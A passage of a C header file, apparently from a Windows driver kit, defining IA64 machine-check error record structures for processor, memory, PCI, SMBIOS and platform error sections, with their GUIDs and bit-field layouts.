756 | ULONGLONG Eic:4; // 8-11: Instruction Caches Level Information
757 | ULONGLONG Edc:4; // 12-15: Data Caches Level Information
758 | ULONGLONG Eit:4; // 16-19: Instruction TLB Level Information
759 | ULONGLONG Edt:4; // 20-23: Data TLB Level Information
760 | ULONGLONG Ebh:4; // 24-27: Processor Bus Level Information
761 | ULONGLONG Erf:4; // 28-31: Register File Level Information
762 | ULONGLONG Ems:16; // 32-47: MicroArchitecture Level Information
763 | ULONGLONG Reserved:16;
764 | } DUMMYSTRUCTNAME;
765 | } ERROR_PROCESSOR_ERROR_MAP, *PERROR_PROCESSOR_ERROR_MAP;
766 |
767 | typedef ERROR_PROCESSOR_ERROR_MAP _ERROR_PROCESSOR_LEVEL_INDEX;
768 | typedef _ERROR_PROCESSOR_LEVEL_INDEX ERROR_PROCESSOR_LEVEL_INDEX, *PERROR_PROCESSOR_LEVEL_INDEX;
769 |
770 | typedef union _ERROR_PROCESSOR_STATE_PARAMETER {
771 | ULONGLONG StateParameter;
772 | struct {
773 | ULONGLONG reserved0:2; // 0-1 : reserved
774 | ULONGLONG rz:1; // 2 : Rendezvous successful
775 | ULONGLONG ra:1; // 3 : Rendezvous attempted
776 | ULONGLONG me:1; // 4 : Distinct Multiple errors
777 | ULONGLONG mn:1; // 5 : Min-state Save Area registered
778 | ULONGLONG sy:1; // 6 : Storage integrity synchronized
779 | ULONGLONG co:1; // 7 : Continuable
780 | ULONGLONG ci:1; // 8 : Machine Check isolated
781 | ULONGLONG us:1; // 9 : Uncontained Storage damage
782 | ULONGLONG hd:1; // 10 : Hardware damage
783 | ULONGLONG tl:1; // 11 : Trap lost
784 | ULONGLONG mi:1; // 12 : More Information
785 | ULONGLONG pi:1; // 13 : Precise Instruction pointer
786 | ULONGLONG pm:1; // 14 : Precise Min-state Save Area
787 | ULONGLONG dy:1; // 15 : Processor Dynamic State valid
788 | ULONGLONG in:1; // 16 : INIT interruption
789 | ULONGLONG rs:1; // 17 : RSE valid
790 | ULONGLONG cm:1; // 18 : Machine Check corrected
791 | ULONGLONG ex:1; // 19 : Machine Check expected
792 | ULONGLONG cr:1; // 20 : Control Registers valid
793 | ULONGLONG pc:1; // 21 : Performance Counters valid
794 | ULONGLONG dr:1; // 22 : Debug Registers valid
795 | ULONGLONG tr:1; // 23 : Translation Registers valid
796 | ULONGLONG rr:1; // 24 : Region Registers valid
797 | ULONGLONG ar:1; // 25 : Application Registers valid
798 | ULONGLONG br:1; // 26 : Branch Registers valid
799 | ULONGLONG pr:1; // 27 : Predicate Registers valid
800 | ULONGLONG fp:1; // 28 : Floating-Point Registers valid
801 | ULONGLONG b1:1; // 29 : Preserved Bank 1 General Registers valid
802 | ULONGLONG b0:1; // 30 : Preserved Bank 0 General Registers valid
803 | ULONGLONG gr:1; // 31 : General Registers valid
804 | ULONGLONG dsize:16; // 47-32 : Processor Dynamic State size
805 | ULONGLONG reserved1:11; // 48-58 : reserved
806 | ULONGLONG cc:1; // 59 : Cache Check
807 | ULONGLONG tc:1; // 60 : TLB Check
808 | ULONGLONG bc:1; // 61 : Bus Check
809 | ULONGLONG rc:1; // 62 : Register File Check
810 | ULONGLONG uc:1; // 63 : Micro-Architectural Check
811 | } DUMMYSTRUCTNAME;
812 | } ERROR_PROCESSOR_STATE_PARAMETER, *PERROR_PROCESSOR_STATE_PARAMETER;
813 |
814 | typedef union _PROCESSOR_LOCAL_ID {
815 | ULONGLONG LocalId;
816 | struct {
817 | ULONGLONG reserved:16; // 0-16 : reserved
818 | ULONGLONG eid:8; // 16-23 : Extended Id
819 | ULONGLONG id:8; // 24-31 : Id
820 | ULONGLONG ignored:32; // 32-63 : ignored
821 | } DUMMYSTRUCTNAME;
822 | } PROCESSOR_LOCAL_ID, *PPROCESSOR_LOCAL_ID;
823 |
824 | typedef struct _ERROR_PROCESSOR_MS {
825 | ULONGLONG MsError [ /* Valid.MsCheckNum */ 1]; // 0 -> 15 registers file errors.
826 | } ERROR_PROCESSOR_MS, *PERROR_PROCESSOR_MS;
827 |
828 | typedef struct _ERROR_PROCESSOR_CPUID_INFO { // Must be 48 bytes.
829 | ULONGLONG CpuId0;
830 | ULONGLONG CpuId1;
831 | ULONGLONG CpuId2;
832 | ULONGLONG CpuId3;
833 | ULONGLONG CpuId4;
834 | ULONGLONG Reserved;
835 | } ERROR_PROCESSOR_CPUID_INFO, *PERROR_PROCESSOR_CPUID_INFO;
836 |
837 | typedef union _ERROR_PROCESSOR_STATIC_INFO_VALID {
838 | ULONGLONG Valid;
839 | struct { // Bits
840 | // Warning: Match the VALID fields with the _ERROR_PROCESSOR_STATIC_INFO members.
841 | // KD extensions use the field names to access the PSI structure.
842 | ULONGLONG MinState: 1; // 0: MinState valid.
843 | ULONGLONG BR: 1; // 1: Branch Registers valid.
844 | ULONGLONG CR: 1; // 2: Control Registers valid.
845 | ULONGLONG AR: 1; // 3: Application Registers valid.
846 | ULONGLONG RR: 1; // 4: Registers valid.
847 | ULONGLONG FR: 1; // 5: Registers valid.
848 | ULONGLONG Reserved: 58; // 6-63: Reserved.
849 | } DUMMYSTRUCTNAME;
850 | } ERROR_PROCESSOR_STATIC_INFO_VALID, *PERROR_PROCESSOR_STATIC_INFO_VALID;
851 |
852 | typedef struct _ERROR_PROCESSOR_STATIC_INFO {
853 | ERROR_PROCESSOR_STATIC_INFO_VALID Valid;
854 | UCHAR MinState[ /* SAL Specs, July 2000 and Jan 2001 state approximatively: */ 1024];
855 | ULONGLONG BR [ 8 ];
856 | ULONGLONG CR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ];
857 | ULONGLONG AR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ];
858 | ULONGLONG RR [ 8 ];
859 | ULONGLONG FR [ 2 * 128 ];
860 | } ERROR_PROCESSOR_STATIC_INFO, *PERROR_PROCESSOR_STATIC_INFO;
861 |
862 | typedef struct _ERROR_PROCESSOR {
863 | ERROR_SECTION_HEADER Header;
864 | ERROR_PROCESSOR_VALID Valid;
865 | ERROR_PROCESSOR_ERROR_MAP ErrorMap;
866 | ERROR_PROCESSOR_STATE_PARAMETER StateParameter;
867 | PROCESSOR_LOCAL_ID CRLid;
868 | #if 0
869 | // The presence of the following data depends on the valid bits
870 | // from ERROR_PROCESSOR.Valid.
871 | //
872 | ERROR_MODINFO CacheErrorInfo [ /* Valid.CacheCheckNum */ ]; // 0->15 cache error modinfo structs.
873 | ERROR_MODINFO TlbErrorInfo [ /* Valid.TlbCheckNum */ ]; // 0->15 tlb error modinfo structs.
874 | ERROR_MODINFO BusErrorInfo [ /* Valid.BusCheckNum */ ]; // 0->15 bus error modinfo structs.
875 | ERROR_MODINFO RegFileCheckInfo [ /* Valid.RegFileCheckNum */ ]; // 0->15 registers file errors.
876 | ERROR_MODINFO MsCheckInfo [ /* Valid.MsCheckNum */ ]; // 0->15 registers file errors.
877 | ERROR_PROCESSOR_CPUID_INFO CpuIdInfo; // field will always be there but could be zero-padded.
878 | ERROR_PROCESSOR_STATIC_INFO StaticInfo; // field will always be there but could be zero-padded.
879 | #endif // 0
880 | } ERROR_PROCESSOR, *PERROR_PROCESSOR;
881 |
882 | //
883 | // IA64 ERROR PROCESSOR State Parameter - GR18 - definitions.
884 | //
885 |
886 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_SHIFT 59
887 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_MASK 0x1
888 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_SHIFT 60
889 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_MASK 0x1
890 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_SHIFT 61
891 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_MASK 0x1
892 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_SHIFT 62
893 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_MASK 0x1
894 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT 63
895 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK 0x1
896 |
897 | //
898 | // For legacy consumers
899 | //
900 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_SHIFT ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT
901 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_MASK ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK
902 |
903 | ////////////////////////////////////////////////////////////////////
904 | //
905 | // IA64 PLATFORM ERRORS Definitions
906 | //
907 | // We tried to respect the order in which these error devices are
908 | // presented in the SAL specs.
909 |
910 | //
911 | // IA64 ERRORS: _ERR_TYPE definitions
912 | //
913 | // Warning 04/01/01: "ERR_TYPE" or "ERROR_TYPE" are already used in the NT namespace.
914 | //
915 |
916 | typedef enum _ERR_TYPES {
917 | // Generic error types:
918 | ERR_INTERNAL = 1, // Error detected internal to the component
919 | ERR_BUS = 16, // Error detected in the bus
920 | // Detailed Internal Error Types:
921 | ERR_MEM = 4, // Storage error in memory (DRAM)
922 | ERR_TLB = 5, // Storage error in TLB
923 | ERR_CACHE = 6, // Storage error in cache
924 | ERR_FUNCTION = 7, // Error in one or more functional units
925 | ERR_SELFTEST = 8, // Component failed self test
926 | ERR_FLOW = 9, // Overflow or Undervalue of internal queue
927 | // Detailed Bus Error Types:
928 | ERR_MAP = 17, // Virtual address not found on IO-TLB or IO-PDIR
929 | ERR_IMPROPER = 18, // Improper access error
930 | ERR_UNIMPL = 19, // Access to a memory address which is not mapped to any component
931 | ERR_LOL = 20, // Loss Of Lockstep
932 | ERR_RESPONSE = 21, // Response to which there is no associated request
933 | ERR_PARITY = 22, // Bus parity error
934 | ERR_PROTOCOL = 23, // Detection of a protocol error
935 | ERR_ERROR = 24, // Detection of PATH_ERROR
936 | ERR_TIMEOUT = 25, // Bus operation time-out
937 | ERR_POISONED = 26, // A read was issued to data which has been poisoned
938 | } _ERR_TYPE;
939 |
940 | //
941 | // IA64 ERRORS: ERROR_STATUS definitions
942 | //
943 |
944 | typedef union _ERROR_STATUS {
945 | ULONGLONG Status;
946 | struct { // Bits:
947 | ULONGLONG Reserved0:8; // 7-0: Reserved
948 | ULONGLONG Type:8; // 15-8: Error Type - See _ERR_TYPE definitions.
949 | ULONGLONG Address:1; // 16: Error was detected on address signals or on address portion of transaction
950 | ULONGLONG Control:1; // 17: Error was detected on control signals or in control portion of transaction
951 | ULONGLONG Data:1; // 18: Error was detected on data signals or in data portion of transaction
952 | ULONGLONG Responder:1; // 19: Error was detected by responder of transaction
953 | ULONGLONG Requestor:1; // 20: Error was detected by requester of transaction
954 | ULONGLONG FirstError:1; // 21: If multiple errors, this is the first error of the highest severity that occurred
955 | ULONGLONG Overflow:1; // 22: Additional errors occurred which were not logged because registers overflow
956 | ULONGLONG Reserved1:41; // 63-23: Reserved
957 | } DUMMYSTRUCTNAME;
958 | } ERROR_STATUS, *PERROR_STATUS;
959 |
960 | //
961 | // IA64 ERRORS: Platform OEM_DATA definitions
962 | //
963 |
964 | typedef struct _ERROR_OEM_DATA {
965 | USHORT Length;
966 | #if 0
967 | UCHAR Data[/* ERROR_OEM_DATA.Length */];
968 | #endif // 0
969 | } ERROR_OEM_DATA, *PERROR_OEM_DATA;
970 |
971 | //
972 | // IA64 ERRORS: Platform BUS_SPECIFIC_DATA definitions
973 | //
974 |
975 | typedef union _ERROR_BUS_SPECIFIC_DATA {
976 | ULONGLONG BusSpecificData;
977 | struct { // Bits :
978 | ULONGLONG LockAsserted:1; // 0: LOCK# Asserted during request phase
979 | ULONGLONG DeferLogged:1; // 1: Defer phase is logged
980 | ULONGLONG IOQEmpty:1; // 2: IOQ is empty
981 | ULONGLONG DeferredTransaction:1; // 3: Component interface deferred transaction
982 | ULONGLONG RetriedTransaction:1; // 4: Component interface retried transaction
983 | ULONGLONG MemoryClaimedTransaction:1; // 5: memory claimed the transaction
984 | ULONGLONG IOClaimedTransaction:1; // 6: IO controller claimed the transaction
985 | ULONGLONG ResponseParitySignal:1; // 7: Response parity signal
986 | ULONGLONG DeferSignal:1; // 8: DEFER# signal
987 | ULONGLONG HitMSignal:1; // 9: HITM# signal
988 | ULONGLONG HitSignal:1; // 10: HIT# signal
989 | ULONGLONG RequestBusFirstCycle:6; // 16-11: First cycle of request bus
990 | ULONGLONG RequestBusSecondCycle:6; // 22-17: Second cycle of request bus
991 | ULONGLONG AddressParityBusFirstCycle:2; // 24-23: First cycle of address parity bus
992 | ULONGLONG AddressParityBusSecondCycle:2; // 26-25: Second cycle of address parity
993 | ULONGLONG ResponseBus:3; // 29-27: Response bus
994 | ULONGLONG RequestParitySignalFirstCycle:1; // 30: First cycle of request parity signal
995 | ULONGLONG RequestParitySignalSecondCycle:1; // 31: Second cycle of request parity signal
996 | ULONGLONG Reserved:32; // 63-32: Reserved
997 | } DUMMYSTRUCTNAME;
998 | } ERROR_BUS_SPECIFIC_DATA, *PERROR_BUS_SPECIFIC_DATA;
999 |
1000 | //
1001 | // IA64 ERRORS: Platform ERROR_MEMORY device definitions
1002 | //
1003 | // With reference to the ACPI Memory Device.
1004 | //
1005 |
1006 | #define ERROR_MEMORY_GUID \
1007 | { 0xe429faf2, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1008 |
1009 | typedef union _ERROR_MEMORY_VALID {
1010 | ULONGLONG Valid;
1011 | struct { // Bits
1012 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1013 | ULONGLONG PhysicalAddress:1; // 1: Physical Address valid bit
1014 | ULONGLONG AddressMask:1; // 2: Address Mask bit
1015 | ULONGLONG Node:1; // 3: Node valid bit
1016 | ULONGLONG Card:1; // 4: Card valid bit
1017 | ULONGLONG Module:1; // 5: Module valid bit
1018 | ULONGLONG Bank:1; // 6: Bank valid bit
1019 | ULONGLONG Device:1; // 7: Device valid bit
1020 | ULONGLONG Row:1; // 8: Row valid bit
1021 | ULONGLONG Column:1; // 9: Column valid bit
1022 | ULONGLONG BitPosition:1; // 10: Bit Position valid bit
1023 | ULONGLONG RequestorId:1; // 11: Platform Requester Id valid bit
1024 | ULONGLONG ResponderId:1; // 12: Platform Responder Id valid bit
1025 | ULONGLONG TargetId:1; // 13: Platform Target Id valid bit
1026 | ULONGLONG BusSpecificData:1; // 14: Platform Bus specific data valid bit
1027 | ULONGLONG OemId:1; // 15: Platform OEM id valid bit
1028 | ULONGLONG OemData:1; // 16: Platform OEM data valid bit
1029 | ULONGLONG Reserved:47; // 63-17: Reserved
1030 | } DUMMYSTRUCTNAME;
1031 | } ERROR_MEMORY_VALID, *PERROR_MEMORY_VALID;
1032 |
1033 | typedef struct _ERROR_MEMORY {
1034 | ERROR_SECTION_HEADER Header;
1035 | ERROR_MEMORY_VALID Valid;
1036 | ERROR_STATUS ErrorStatus; // Memory device error status fields - See ERROR_STATUS defs.
1037 | ULONGLONG PhysicalAddress; // Physical Address of the memory error
1038 | ULONGLONG PhysicalAddressMask; // Valid bits for Physical Address
1039 | USHORT Node; // Node identifier in a multi-node system
1040 | USHORT Card; // Card number of the memory error location
1041 | USHORT Module; // Module number of the memory error location
1042 | USHORT Bank; // Bank number of the memory error location
1043 | USHORT Device; // Device number of the memory error location
1044 | USHORT Row; // Row number of the memory error location
1045 | USHORT Column; // Column number of the memory error location
1046 | USHORT BitPosition; // Bit within the word that is in error
1047 | ULONGLONG RequestorId; // Hardware address of the device or component initiating transaction
1048 | ULONGLONG ResponderId; // Hardware address of the responder to transaction
1049 | ULONGLONG TargetId; // Hardware address of intended target of transaction
1050 | ULONGLONG BusSpecificData; // Bus dependent data of the on-board processor. It is a OEM specific field.
1051 | UCHAR OemId[16]; // OEM defined identification for memory controller
1052 | ERROR_OEM_DATA OemData; // OEM platform specific data.
1053 | } ERROR_MEMORY, *PERROR_MEMORY;
1054 |
1055 | //
1056 | // IA64 ERRORS: Platform ERROR_PCI_BUS device definitions
1057 | //
1058 | // With reference to the PCI Specifications.
1059 | //
1060 |
1061 | #define ERROR_PCI_BUS_GUID \
1062 | { 0xe429faf4, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1063 |
1064 | typedef union _ERROR_PCI_BUS_VALID {
1065 | ULONGLONG Valid;
1066 | struct { // Bits
1067 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1068 | ULONGLONG ErrorType:1; // 1: Error Type valid bit
1069 | ULONGLONG Id:1; // 2: Identifier valid bit
1070 | ULONGLONG Address:1; // 3: Address valid bit
1071 | ULONGLONG Data:1; // 4: Data valid bit
1072 | ULONGLONG CmdType:1; // 5: Command Type valid bit
1073 | ULONGLONG RequestorId:1; // 6: Requester Identifier valid bit
1074 | ULONGLONG ResponderId:1; // 7: Responder Identifier valid bit
1075 | ULONGLONG TargetId:1; // 8: Target Identifier valid bit
1076 | ULONGLONG OemId:1; // 9: OEM Identification valid bit
1077 | ULONGLONG OemData:1; // 10: OEM Data valid bit
1078 | ULONGLONG Reserved:53; // 11-63: Reserved
1079 | } DUMMYSTRUCTNAME;
1080 | } ERROR_PCI_BUS_VALID, *PERROR_PCI_BUS_VALID;
1081 |
1082 | typedef struct _ERROR_PCI_BUS_TYPE {
1083 | UCHAR Type;
1084 | UCHAR Reserved;
1085 | } ERROR_PCI_BUS_TYPE, *PERROR_PCI_BUS_TYPE;
1086 |
1087 | #define PciBusUnknownError ((UCHAR)0)
1088 | #define PciBusDataParityError ((UCHAR)1)
1089 | #define PciBusSystemError ((UCHAR)2)
1090 | #define PciBusMasterAbort ((UCHAR)3)
1091 | #define PciBusTimeOut ((UCHAR)4)
1092 | #define PciMasterDataParityError ((UCHAR)5)
1093 | #define PciAddressParityError ((UCHAR)6)
1094 | #define PciCommandParityError ((UCHAR)7)
1095 | // PciOtherErrors Reserved
1096 |
1097 | typedef struct _ERROR_PCI_BUS_ID {
1098 | UCHAR BusNumber; // Bus Number
1099 | UCHAR SegmentNumber; // Segment Number
1100 | } ERROR_PCI_BUS_ID, *PERROR_PCI_BUS_ID;
1101 |
1102 | typedef struct _ERROR_PCI_BUS {
1103 | ERROR_SECTION_HEADER Header;
1104 | ERROR_PCI_BUS_VALID Valid;
1105 | ERROR_STATUS ErrorStatus; // PCI Bus Error Status - See ERROR_STATUS definitions.
1106 | ERROR_PCI_BUS_TYPE Type; // PCI Bus Error Type
1107 | ERROR_PCI_BUS_ID Id; // PCI Bus Identifier
1108 | UCHAR Reserved[4]; // Reserved
1109 | ULONGLONG Address; // Memory or IO Address on the PCI bus at
1110 | // the time of the event
1111 | ULONGLONG Data; // Data on the PCI bus at time of the event
1112 | ULONGLONG CmdType; // Bus Command or Operation at time of the event
1113 | ULONGLONG RequestorId; // Bus Requester Identifier at time of the event
1114 | ULONGLONG ResponderId; // Bus Responder Identifier at time of the event
1115 | ULONGLONG TargetId; // Intended Bus Target Identifier at time of the event
1116 | UCHAR OemId[16]; // OEM defined identification for pci bus
1117 | ERROR_OEM_DATA OemData; // OEM specific data.
1118 | } ERROR_PCI_BUS, *PERROR_PCI_BUS;
1119 |
1120 | //
1121 | // IA64 ERRORS: Platform ERROR_PCI_COMPONENT device definitions
1122 | //
1123 | // With reference to the PCI Specifications.
1124 | //
1125 |
1126 | #define ERROR_PCI_COMPONENT_GUID \
1127 | { 0xe429faf6, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1128 |
1129 | typedef union _ERROR_PCI_COMPONENT_VALID {
1130 | ULONGLONG Valid;
1131 | struct { // Bits:
1132 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1133 | ULONGLONG Info:1; // 1: Information valid bit
1134 | ULONGLONG MemoryMappedRegistersPairs:1; // 2: Number of Memory Mapped Registers Pairs valid bit
1135 | ULONGLONG ProgrammedIORegistersPairs:1; // 3: Number of Programmed IO Registers Pairs valid bit
1136 | ULONGLONG RegistersDataPairs:1; // 4: Memory Mapped Registers Pairs valid bit
1137 | ULONGLONG OemData:1; // 5: OEM Data valid bit.
1138 | ULONGLONG Reserved:58; // 63-6: Reserved
1139 | } DUMMYSTRUCTNAME;
1140 | } ERROR_PCI_COMPONENT_VALID, *PERROR_PCI_COMPONENT_VALID;
1141 |
1142 | typedef struct _ERROR_PCI_COMPONENT_INFO { // Bytes:
1143 | USHORT VendorId; // 0-1: Vendor Identifier
1144 | USHORT DeviceId; // 2-3: Device Identifier
1145 | UCHAR ClassCodeInterface; // 4: Class Code.Interface field
1146 | UCHAR ClassCodeSubClass; // 5: Class Code.SubClass field
1147 | UCHAR ClassCodeBaseClass; // 6: Class Code.BaseClass field
1148 | UCHAR FunctionNumber; // 7: Function Number
1149 | UCHAR DeviceNumber; // 8: Device Number
1150 | UCHAR BusNumber; // 9: Bus Number
1151 | UCHAR SegmentNumber; // 10: Segment Number
1152 | UCHAR Reserved0;
1153 | ULONG Reserved1;
1154 | } ERROR_PCI_COMPONENT_INFO, *PERROR_PCI_COMPONENT_INFO;
1155 |
1156 | typedef struct _ERROR_PCI_COMPONENT {
1157 | ERROR_SECTION_HEADER Header;
1158 | ERROR_PCI_COMPONENT_VALID Valid;
1159 | ERROR_STATUS ErrorStatus; // Component Error Status
1160 | ERROR_PCI_COMPONENT_INFO Info; // Component Information
1161 | ULONG MemoryMappedRegistersPairs; // Number of Memory Mapped Registers Pairs
1162 | ULONG ProgrammedIORegistersPairs; // Number of Programmed IO Registers Pairs
1163 | #if 0
1164 | ULONGLONG RegistersPairs[/* 2 * (MemoryMappedRegistersPairs + ProgrammedIORegistersPairs) */];
1165 | ERROR_OEM_DATA OemData;
1166 | #endif // 0
1167 | } ERROR_PCI_COMPONENT, *PERROR_PCI_COMPONENT;
1168 |
1169 | //
1170 | // IA64 ERRORS: Platform ERROR_SYSTEM_EVENT_LOG device definitions
1171 | //
1172 | // With reference to the IPMI System Event Log.
1173 | //
1174 |
1175 | #define ERROR_SYSTEM_EVENT_LOG_GUID \
1176 | { 0xe429faf3, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1177 |
1178 | typedef union _ERROR_SYSTEM_EVENT_LOG_VALID {
1179 | ULONGLONG Valid;
1180 | struct { // Bits
1181 | ULONGLONG RecordId:1; // 0: Record Identifier valid bit
1182 | ULONGLONG RecordType:1; // 1: Record Type valid bit
1183 | ULONGLONG GeneratorId:1; // 2: Generator Identifier valid bit
1184 | ULONGLONG EVMRev:1; // 3: Event Format Revision valid bit
1185 | ULONGLONG SensorType:1; // 4: Sensor Type valid bit
1186 | ULONGLONG SensorNum:1; // 5: Sensor Number valid bit
1187 | ULONGLONG EventDirType:1; // 6: Event Dir valid bit
1188 | ULONGLONG EventData1:1; // 7: Event Data1 valid bit
1189 | ULONGLONG EventData2:1; // 8: Event Data2 valid bit
1190 | ULONGLONG EventData3:1; // 9: Event Data3 valid bit
1191 | ULONGLONG Reserved:54; // 10-63:
1192 | } DUMMYSTRUCTNAME;
1193 | } ERROR_SYSTEM_EVENT_LOG_VALID, *PSYSTEM_EVENT_LOG_VALID;
1194 |
1195 | typedef struct _ERROR_SYSTEM_EVENT_LOG {
1196 | ERROR_SECTION_HEADER Header;
1197 | ERROR_SYSTEM_EVENT_LOG_VALID Valid;
1198 | USHORT RecordId; // Record Identifier used for SEL record access
1199 | UCHAR RecordType; // Record Type:
1200 | // 0x02 - System Event Record
1201 | // 0xC0 - 0xDF OEM time stamped, bytes 8-16 OEM defined
1202 | // 0xE0 - 0xFF OEM non-time stamped, bytes 4-16 OEM defined
1203 | ULONG TimeStamp; // Time stamp of the event log
1204 | USHORT GeneratorId; // Software ID if event was generated by software
1205 | // Byte 1:
1206 | // Bit 0 - set to 1 when using system software
1207 | // Bit 7:1 - 7-bit system ID
1208 | // Byte 2:
1209 | // Bit 1:0 - IPMB device LUN if byte 1 holds subordinate
1210 | // address, 0x0 otherwise
1211 | // Bit 7:2 - Reserved.
1212 | UCHAR EVMRevision; // Error message format version
1213 | UCHAR SensorType; // Sensor Type code of the sensor that generated event
1214 | UCHAR SensorNumber; // Number of the sensor that generated event
1215 | UCHAR EventDir; // Event Dir
1216 | // Bit 7 - 0: asserted, 1: desasserted
1217 | // Event Type
1218 | // Bit 6:0 - Event Type code
1219 | UCHAR Data1; // Event data field
1220 | UCHAR Data2; // Event data field
1221 | UCHAR Data3; // Event data field
1222 | } ERROR_SYSTEM_EVENT_LOG, *PERROR_SYSTEM_EVENT_LOG;
1223 |
1224 | //
1225 | // IA64 ERRORS: Platform ERROR_SMBIOS device definitions
1226 | //
1227 | // With reference to the SMBIOS Specifications.
1228 | //
1229 |
1230 | #define ERROR_SMBIOS_GUID \
1231 | { 0xe429faf5, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1232 |
1233 | typedef union _ERROR_SMBIOS_VALID {
1234 | ULONGLONG Valid;
1235 | struct { // Bits
1236 | ULONGLONG EventType:1; // 0: Event Type valid bit
1237 | ULONGLONG Length:1; // 1: Length valid bit
1238 | ULONGLONG TimeStamp:1; // 2: Time Stamp valid bit
1239 | ULONGLONG OemData:1; // 3: Data valid bit
1240 | ULONGLONG Reserved:60; // 4-63:
1241 | } DUMMYSTRUCTNAME;
1242 | } ERROR_SMBIOS_VALID, *PERROR_SMBIOS_VALID;
1243 |
1244 | //
1245 | // ERROR_SMBIOS.Type definitions
1246 | //
1247 |
1248 | typedef UCHAR ERROR_SMBIOS_EVENT_TYPE, *PERROR_SMBIOS_EVENT_TYPE;
1249 | // enum values defined in SMBIOS 2.3 - 3.3.16.6.1
1250 |
1251 | typedef struct _ERROR_SMBIOS {
1252 | ERROR_SECTION_HEADER Header;
1253 | ERROR_SMBIOS_VALID Valid;
1254 | ERROR_SMBIOS_EVENT_TYPE EventType; // Event Type
1255 | UCHAR Length; // Length of the error information in bytes
1256 | ERROR_TIMESTAMP TimeStamp; // Event Time Stamp
1257 | ERROR_OEM_DATA OemData; // Optional data validated by SMBIOS.Valid.Data.
1258 | } ERROR_SMBIOS, *PERROR_SMBIOS;
1259 |
1260 | //
1261 | // IA64 ERRORS: Platform Specific error device definitions
1262 | //
1263 |
1264 | #define ERROR_PLATFORM_SPECIFIC_GUID \
1265 | { 0xe429faf7, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1266 |
1267 | typedef union _ERROR_PLATFORM_SPECIFIC_VALID {
1268 | ULONGLONG Valid;
1269 | struct { // Bits:
1270 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1271 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit
1272 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit
1273 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit
1274 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit
1275 | ULONGLONG OemId:1; // 5: OEM Identification valid bit
1276 | ULONGLONG OemData:1; // 6: OEM Data valid bit
1277 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit
1278 | ULONGLONG Reserved:56; // 63-8: Reserved
1279 | } DUMMYSTRUCTNAME;
1280 | } ERROR_PLATFORM_SPECIFIC_VALID, *PERROR_PLATFORM_SPECIFIC_VALID;
1281 |
1282 | typedef struct _ERROR_PLATFORM_SPECIFIC {
1283 | ERROR_SECTION_HEADER Header;
1284 | ERROR_PLATFORM_SPECIFIC_VALID Valid;
1285 | ERROR_STATUS ErrorStatus; // Platform Generic Error Status
1286 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event
1287 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event
1288 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event
1289 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data
1290 | UCHAR OemId[16]; // OEM specific data for bus identification
1291 | ERROR_OEM_DATA OemData; // OEM specific data
1292 | #if 0
1293 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path.
1294 | #endif // 0
1295 | } ERROR_PLATFORM_SPECIFIC, *PERROR_PLATFORM_SPECIFIC;
1296 |
1297 | //
1298 | // IA64 ERRORS: Platform Bus error device definitions
1299 | //
1300 |
1301 | #define ERROR_PLATFORM_BUS_GUID \
1302 | { 0xe429faf9, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1303 |
1304 | typedef union _ERROR_PLATFORM_BUS_VALID {
1305 | ULONGLONG Valid;
1306 | struct { // Bits:
1307 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1308 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit
1309 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit
1310 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit
1311 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit
1312 | ULONGLONG OemId:1; // 5: OEM Identification valid bit
1313 | ULONGLONG OemData:1; // 6: OEM Data valid bit
1314 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit
1315 | ULONGLONG Reserved:56; // 63-8: Reserved
1316 | } DUMMYSTRUCTNAME;
1317 | } ERROR_PLATFORM_BUS_VALID, *PERROR_PLATFORM_BUS_VALID;
1318 |
1319 | typedef struct _ERROR_PLATFORM_BUS {
1320 | ERROR_SECTION_HEADER Header;
